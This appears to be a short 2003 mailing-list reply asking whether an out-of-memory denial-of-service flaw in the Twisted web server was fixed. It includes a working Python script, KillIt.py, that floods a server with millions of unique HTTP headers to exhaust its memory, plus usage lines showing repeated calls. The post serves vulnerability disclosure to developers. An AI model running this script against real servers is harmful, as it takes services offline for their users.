Me:
Was the out-of-memory denial of service attack fixed?
http://www.twistedmatrix.com/pipermail/twisted-python/2003-June/ 004462.html
Err, that code doesn't actually work (it reuses the same header names, so there isn't a memory problem). Here's some real attack code ===== KillIt.py import socket class KillIt: def __init__(self, where): self.f = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.f.connect(where) self.f.send("GET / HTTP/1.1\r\n") self.n = 0 def kill(self): factor = 1000000 for i in range(self.n*factor, (self.n+1)*factor): self.f.send("%s: X\r\n" % i) if i%1000 == 0: print i self.n += 1 =======
import KillIt server = KillIt.KillIt( ("localhost", 8080) ) server.kill() ... lots of output showing that it's dumping headers ... server.kill() ... each invocation takes about 50MB or so server.kill() ... repeat until desired ...
Andrew